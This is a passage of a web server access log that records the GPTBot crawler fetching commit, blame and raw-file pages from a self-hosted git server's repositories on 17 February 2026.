+[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11531] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 12204] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 12464] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fassetpilot.ico" [Client 74.7.227.38] [Length 23877] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fQUICKSTART.md" [Client 74.7.227.38] [Length 28166] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" +[17/Feb/2026:13:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:13:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10390] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10393] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:13:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:13:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" +[17/Feb/2026:13:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html?display=rendered" [Client 74.7.227.38] [Length 14599] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10389] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10395] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" +[17/Feb/2026:13:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" +[17/Feb/2026:13:43:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:13:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/" +[17/Feb/2026:13:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13481] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13183] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13510] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:13:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:13:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:13:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" +[17/Feb/2026:13:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:13:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13149] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39568] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44637] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42201] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" +[17/Feb/2026:13:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fServices.tsx" [Client 74.7.227.38] [Length 26574] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27247] [Gzip 11.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9499] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42033] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 21804] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:13:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11896] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:13:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:13:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/graph" [Client 74.7.227.38] [Length 9645] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" +[17/Feb/2026:13:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 23713] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:13:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10082] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 